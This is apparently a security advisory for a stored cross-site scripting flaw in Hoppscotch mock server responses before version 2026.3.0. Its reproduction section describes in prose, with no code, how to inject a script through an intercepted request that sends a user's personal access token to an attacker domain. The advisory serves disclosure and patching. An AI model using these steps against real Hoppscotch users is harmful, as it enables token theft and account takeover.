Hoppscotch Stored Cross-Site Scripting Vulnerability Leading to Cross-Site Request Forgery

A stored cross-site scripting vulnerability has been identified in Hoppscotch versions prior to 2026.3.0. This vulnerability can lead to cross-site request forgery. The issue arises from mock server responses that allow the injection of malicious scripts, which can then be executed in the context of the user.

Impact

Exploitation of this vulnerability allows for stored cross-site scripting, where injected scripts are executed in the context of the user, potentially leading to cross-site request forgery.

Reproduction

To reproduce this vulnerability, create a mock server from a new collection in Hoppscotch, ensuring that example requests are added. Intercept a request using a tool like Burp Suite and modify the request body to include a script that exfiltrates a personal access token (PAT) to an external server. After forwarding the request, the PAT will be sent to the specified attacker domain, demonstrating the successful exploitation of the vulnerability.

Remediation

Users should update to Hoppscotch version 2026.3.0 or later, where this vulnerability has been patched.